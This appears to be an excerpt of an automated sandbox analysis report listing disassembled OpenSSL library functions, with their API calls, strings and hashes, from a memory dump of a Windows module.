Associated: 00000002.00000002.220671202.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: memmove$memset
String ID:
API String ID: 3790616698-0
Opcode ID: 7bd3081549f37e99082b2e2184b592387e8504f8a293854baa3812126ce6fff8
Instruction ID: ef228217251fa738fd2fdc68da1d979ef389dc1a69dbe499d5f87608ff27f064
Opcode Fuzzy Hash: 7bd3081549f37e99082b2e2184b592387e8504f8a293854baa3812126ce6fff8
Instruction Fuzzy Hash: CE51E022B1D78986DA109B16F85026EBBA0FB89BD4F484135EF9D07B95CE3CE501D740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE2B5D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57networkCOMMON

Download Yara Rule

APIs

bind.WS2_32 ref: 00007FFD3FCAA639
WSAGetLastError.WS2_32 ref: 00007FFD3FCAA648

Strings

..\s\crypto\bio\b_sock2.c, xrefs: 00007FFD3FCAA5EE, 00007FFD3FCAA65E, 00007FFD3FCAA67A

Memory Dump Source

Source File: 00000002.00000002.220421572.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000002.00000002.220412260.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220649763.00007FFD3FEFE000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220660054.00007FFD3FEFF000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220671202.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: ErrorLastbind
String ID: ..\s\crypto\bio\b_sock2.c
API String ID: 2328862993-3200932406
Opcode ID: 6030828c8e1e392444e633d6f91595f56864d96a03ab1f3b7ff65bab8f1c30fa
Instruction ID: 30c56119b40f581610f269746c31011502d75ef32152aae7b22b15237a8ead8a
Opcode Fuzzy Hash: 6030828c8e1e392444e633d6f91595f56864d96a03ab1f3b7ff65bab8f1c30fa
Instruction Fuzzy Hash: 93210F72B0824A82E754DB22F8246AD7360FB90B84F440231EB5C43BDADF3DE546EB01

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FD93EC0 Relevance: 49.7, APIs: 19, Strings: 14, Instructions: 223stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD3FD94B03,?,?,?,?,?,?,?,?,00007FFD3FD92B3B), ref: 00007FFD3FD93F11
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD3FD94B03,?,?,?,?,?,?,?,?,00007FFD3FD92B3B), ref: 00007FFD3FD93F28
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD3FD94B03,?,?,?,?,?,?,?,?,00007FFD3FD92B3B), ref: 00007FFD3FD93F3F
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD3FD94B03,?,?,?,?,?,?,?,?,00007FFD3FD92B3B), ref: 00007FFD3FD93F72
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD3FD94B03,?,?,?,?,?,?,?,?,00007FFD3FD92B3B), ref: 00007FFD3FD93FBB
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD3FD94B03,?,?,?,?,?,?,?,?,00007FFD3FD92B3B), ref: 00007FFD3FD93FEF
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD3FD94B03,?,?,?,?,?,?,?,?,00007FFD3FD92B3B), ref: 00007FFD3FD94041
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD3FD94B03,?,?,?,?,?,?,?,?,00007FFD3FD92B3B), ref: 00007FFD3FD94054
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD3FD94B03,?,?,?,?,?,?,?,?,00007FFD3FD92B3B), ref: 00007FFD3FD9406B
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD3FD94B03,?,?,?,?,?,?,?,?,00007FFD3FD92B3B), ref: 00007FFD3FD9407E
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD3FD94B03,?,?,?,?,?,?,?,?,00007FFD3FD92B3B), ref: 00007FFD3FD94095
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD3FD94B03,?,?,?,?,?,?,?,?,00007FFD3FD92B3B), ref: 00007FFD3FD940A8
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD3FD94B03,?,?,?,?,?,?,?,?,00007FFD3FD92B3B), ref: 00007FFD3FD940BF
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD3FD94B03,?,?,?,?,?,?,?,?,00007FFD3FD92B3B), ref: 00007FFD3FD940D2
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD3FD94B03,?,?,?,?,?,?,?,?,00007FFD3FD92B3B), ref: 00007FFD3FD940E5
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD3FD94B03,?,?,?,?,?,?,?,?,00007FFD3FD92B3B), ref: 00007FFD3FD940F8
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD3FD94B03,?,?,?,?,?,?,?,?,00007FFD3FD92B3B), ref: 00007FFD3FD9410B
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD3FD94B03,?,?,?,?,?,?,?,?,00007FFD3FD92B3B), ref: 00007FFD3FD94157
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD3FD94B03,?,?,?,?,?,?,?,?,00007FFD3FD92B3B), ref: 00007FFD3FD94182

Strings

DH PARAMETERS, xrefs: 00007FFD3FD9404A
PARAMETERS, xrefs: 00007FFD3FD93FB1, 00007FFD3FD93FE1
CMS, xrefs: 00007FFD3FD94187
CERTIFICATE, xrefs: 00007FFD3FD94074, 00007FFD3FD940B5, 00007FFD3FD94101, 00007FFD3FD94178
PKCS7, xrefs: 00007FFD3FD94112
X509 CERTIFICATE, xrefs: 00007FFD3FD94061, 00007FFD3FD940DB
PRIVATE KEY, xrefs: 00007FFD3FD93F35, 00007FFD3FD93F64
TRUSTED CERTIFICATE, xrefs: 00007FFD3FD940C8, 00007FFD3FD940EE
PKCS #7 SIGNED DATA, xrefs: 00007FFD3FD9414D
X9.42 DH PARAMETERS, xrefs: 00007FFD3FD94037
NEW CERTIFICATE REQUEST, xrefs: 00007FFD3FD9408B
CERTIFICATE REQUEST, xrefs: 00007FFD3FD9409E
ANY PRIVATE KEY, xrefs: 00007FFD3FD93F07
ENCRYPTED PRIVATE KEY, xrefs: 00007FFD3FD93F1E

Memory Dump Source

Source File: 00000002.00000002.220421572.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000002.00000002.220412260.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220649763.00007FFD3FEFE000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220660054.00007FFD3FEFF000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220671202.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: strcmp
String ID: ANY PRIVATE KEY$CERTIFICATE$CERTIFICATE REQUEST$CMS$DH PARAMETERS$ENCRYPTED PRIVATE KEY$NEW CERTIFICATE REQUEST$PARAMETERS$PKCS #7 SIGNED DATA$PKCS7$PRIVATE KEY$TRUSTED CERTIFICATE$X509 CERTIFICATE$X9.42 DH PARAMETERS
API String ID: 1004003707-1119032718
Opcode ID: 5e8b8e96afe70edb771b31b8c620808cdee70cc164e9f66a5296f0bd26591d45
Instruction ID: 125f5343d34db9bb31217c7e4bd847cf9c14f235e86eabb713160d7f0ee185b6
Opcode Fuzzy Hash: 5e8b8e96afe70edb771b31b8c620808cdee70cc164e9f66a5296f0bd26591d45
Instruction Fuzzy Hash: 9391E312F0C64F40FE5C9765A53437A1790AFA67D4F449232DF4E936C6EE2DE449A380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE1B77 Relevance: 31.7, APIs: 11, Strings: 7, Instructions: 204stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD3FD9314A
strspn.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD3FD9318A
strspn.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD3FD931AE
strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD3FD931C7
strspn.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD3FD931E3
strspn.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD3FD931FC

Strings

DEK-Info:, xrefs: 00007FFD3FD93237
,, xrefs: 00007FFD3FD9328A
..\s\crypto\pem\pem_lib.c, xrefs: 00007FFD3FD93164, 00007FFD3FD93217, 00007FFD3FD93259, 00007FFD3FD932CE, 00007FFD3FD93316, 00007FFD3FD93344, 00007FFD3FD933F9
, xrefs: 00007FFD3FD931D9
ENCRYPTED, xrefs: 00007FFD3FD931BA
, xrefs: 00007FFD3FD931F2
Proc-Type:, xrefs: 00007FFD3FD93143

Memory Dump Source

Source File: 00000002.00000002.220421572.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000002.00000002.220412260.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220649763.00007FFD3FEFE000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220660054.00007FFD3FEFF000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220671202.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: strspn$strncmp
String ID: $ $ ,$..\s\crypto\pem\pem_lib.c$DEK-Info:$ENCRYPTED$Proc-Type:
API String ID: 1384302209-3505811795
Opcode ID: 1f3d53f96395bba6a1889ce472d6c004119afa851bf96bd522948364e8f60ea3
Instruction ID: bcccf6dc8313dd3520a6f3af1aa437c73151b15f240eed1d7ffef2922d6de6e8
Opcode Fuzzy Hash: 1f3d53f96395bba6a1889ce472d6c004119afa851bf96bd522948364e8f60ea3
Instruction Fuzzy Hash: 9791DFA1B0C64B92F7289F61E82427B3761AF40784F444035DB8E43A96EF3DF54AE780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE4E3F Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 205registryfileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32 ref: 00007FFD3FCEDE64
GetFileType.KERNEL32 ref: 00007FFD3FCEDE75
__stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFD3FCEDEB1
WriteFile.KERNEL32 ref: 00007FFD3FCEDED9
MultiByteToWideChar.KERNEL32 ref: 00007FFD3FCEDF46
__stdio_common_vswprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFD3FCEE0D5
RegisterEventSourceW.ADVAPI32 ref: 00007FFD3FCEE0F4
ReportEventW.ADVAPI32 ref: 00007FFD3FCEE136
DeregisterEventSource.ADVAPI32 ref: 00007FFD3FCEE13F

Strings

no stack?, xrefs: 00007FFD3FCEDF2C
OpenSSL, xrefs: 00007FFD3FCEE0ED
, xrefs: 00007FFD3FCEDF60
OpenSSL: FATAL, xrefs: 00007FFD3FCEE14D

Memory Dump Source

Source File: 00000002.00000002.220421572.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000002.00000002.220412260.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220649763.00007FFD3FEFE000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220660054.00007FFD3FEFF000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220671202.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: Event$FileSource$ByteCharDeregisterHandleMultiRegisterReportTypeWideWrite__stdio_common_vsprintf__stdio_common_vswprintf
String ID: $OpenSSL$OpenSSL: FATAL$no stack?
API String ID: 2603057392-2963566556
Opcode ID: 093cbe26eea9a5ba073ff7be4898ef82592068ef37d190a7ce1a14f29a33bb39
Instruction ID: 973bf5ad7e953ddbd526bd5995371ed29bbe530dc455b4082567d2bc521dbc7f
Opcode Fuzzy Hash: 093cbe26eea9a5ba073ff7be4898ef82592068ef37d190a7ce1a14f29a33bb39
Instruction Fuzzy Hash: CF91D172B08B8A96EB248F24E8641AD7760FB55B95F444336EB5D07B95EF3CE284D300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE1C1C Relevance: 21.3, APIs: 5, Strings: 9, Instructions: 267stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD3FC91B73
strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD3FC91C9C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD3FC91CAF
strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD3FC91E4C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD3FC91E5F

Part of subcall function 00007FFD3FC93970: strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD3FC93A33
Part of subcall function 00007FFD3FC93970: strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD3FC93A4B
Part of subcall function 00007FFD3FC93970: strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD3FC93A68

Strings

type: , xrefs: 00007FFD3FC91CDE, 00007FFD3FC91E8E
..\s\crypto\asn1\asn_mime.c, xrefs: 00007FFD3FC91AEB, 00007FFD3FC91C2D, 00007FFD3FC91CC5, 00007FFD3FC91D41, 00007FFD3FC91DC5, 00007FFD3FC91DF7, 00007FFD3FC91E75, 00007FFD3FC91EFC
content-type, xrefs: 00007FFD3FC91B24
application/pkcs7-mime, xrefs: 00007FFD3FC91E55
application/x-pkcs7-signature, xrefs: 00007FFD3FC91C92
multipart/signed, xrefs: 00007FFD3FC91B69
application/x-pkcs7-mime, xrefs: 00007FFD3FC91E42
application/pkcs7-signature, xrefs: 00007FFD3FC91CA5
boundary, xrefs: 00007FFD3FC91B84

Memory Dump Source

Source File: 00000002.00000002.220421572.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000002.00000002.220412260.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220649763.00007FFD3FEFE000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220660054.00007FFD3FEFF000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220671202.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd3fbe0000_test.jbxd

Similarity

API ID: strcmp$strncmp
String ID: ..\s\crypto\asn1\asn_mime.c$application/pkcs7-mime$application/pkcs7-signature$application/x-pkcs7-mime$application/x-pkcs7-signature$boundary$content-type$multipart/signed$type:
API String ID: 1244041713-3630080479
Opcode ID: 5c4a5fc11c0a7ead12ba8e651eaf5b2b00b3cfbdfac9d494fe84511c4692968e
Instruction ID: 6fced7b3fcb30033d622327943790b28dcc64e51c9e48515a846d5ccae3f02e9
Opcode Fuzzy Hash: 5c4a5fc11c0a7ead12ba8e651eaf5b2b00b3cfbdfac9d494fe84511c4692968e
Instruction Fuzzy Hash: 98C1BFA1B4C64E81FA2CEB21B4A16BE6351AF85784F585032DB4D0778ADF3DE644F312

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE1F69 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 135COMMON

Download Yara Rule

Strings

i, xrefs: 00007FFD3FDADFC9
..\s\crypto\rand\randfile.c, xrefs: 00007FFD3FDADF72, 00007FFD3FDADFD1, 00007FFD3FDAE0DC
Filename=, xrefs: 00007FFD3FDADF93, 00007FFD3FDADFE7, 00007FFD3FDAE0FD

Memory Dump Source

Source File: 00000002.00000002.220421572.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000002.00000002.220412260.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE59000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE8A000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FEB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220649763.00007FFD3FEFE000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220660054.00007FFD3FEFF000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220671202.00007FFD3FF04000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF06000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF23000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220682514.00007FFD3FF27000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd3fbe0000_test.jbxd

Similarity

API ID:
String ID: ..\s\crypto\rand\randfile.c$Filename=$i
API String ID: 0-1799673945
Opcode ID: baf372f6538dde616888fb39e32458d7c2eee731c24cb0b157018b6afcdc2564
Instruction ID: bfdcc154eca4f47c8d264458fce8f95c1700be663659dff3f50eba1c132b2bbf
Opcode Fuzzy Hash: baf372f6538dde616888fb39e32458d7c2eee731c24cb0b157018b6afcdc2564
Instruction Fuzzy Hash: 0251D662B0C64A92FA68DB22E8646BA2391EF80B80F440235DB1D47795EF3DE505E745

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3FBE32AB Relevance: 16.6, APIs: 5, Strings: 6, Instructions: 127stringCOMMON

Download Yara Rule

APIs

atoi.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FFD3FDDAB2C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFD3FDDAB41
atoi.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FFD3FDDAB53

Strings

accuracy, xrefs: 00007FFD3FDDAA63, 00007FFD3FDDAAB3, 00007FFD3FDDAC04
millisecs, xrefs: 00007FFD3FDDAB37
..\s\crypto\ts\ts_conf.c, xrefs: 00007FFD3FDDAAA0, 00007FFD3FDDABEC
p, xrefs: 00007FFD3FDDABE4
secs, xrefs: 00007FFD3FDDAAFD
microsecs, xrefs: 00007FFD3FDDAB5E

Memory Dump Source

Source File: 00000002.00000002.220421572.00007FFD3FBE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFD3FBE0000, based on PE: true

Associated: 00000002.00000002.220412260.00007FFD3FBE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FBED000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC45000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC59000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC6A000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC70000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FC7D000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220421572.00007FFD3FE2C000.00000020.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.220579113.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmpDownload File
